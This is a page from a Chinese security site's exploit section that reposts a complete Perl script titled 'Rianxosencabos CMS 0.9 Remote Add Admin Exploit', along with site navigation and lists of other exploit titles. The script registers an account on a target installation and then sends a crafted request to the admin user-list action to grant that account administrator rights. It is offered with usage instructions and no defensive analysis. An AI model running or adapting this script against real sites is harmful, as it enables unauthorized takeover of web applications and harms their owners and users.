• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Rianxosencabos CMS 0.9 Remote Add Admin Exploit ,其中包含exploit,exploit是什么意思,exploit db,exploit开拓官网,exploit开拓工具等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl -w # Rianxosencabos CMS 0.9 Remote Add Admin Exploit
# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){
print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>\n";
print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n";
exit 1;
} if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;
$req->content_type('application/x-www-form-urlencoded') ;
$req->content("reg_login=".$login."&reg_pass=".$pass."&reg_repass=".$pass."&reg_nombre=".$login."&reg_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ;
my $location = $res->header('Location') ;
if ($location =~ /Usuario creado/i) {
print "[ ] user added: ".$login ;
print "\n[ ] password: ".$pass, "\n" ;
} else{
print "[-] Exploit Failed!\n" ;
}
} &__CREATE ; sub __ADMIN {
my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ;
} &__ADMIN ;
__END__
</div>

您可能想查找下面的文章:

  • Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
  • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
  • Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
  • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
  • NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
  • WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

相关文章

  • Joomla Component EZ Store Remote Blind SQL Injection Exploit
  • Maian Recipe
  • WS_FTP Home/Professional FTP Client Remote Format String PoC
  • Comdev Web Blogger
  • Mole Group Last Minute Script
  • eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
  • iGaming CMS
  • AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
  • phsBlog 0.2 Bypass SQL Injection Filtering Exploit
  • Simple PHP Blog (SPHPBlog)

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)
    • OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC
    • Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
    • IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
    • Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
    • Acoustica Mixcraft
    • NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
    • MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
    • File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有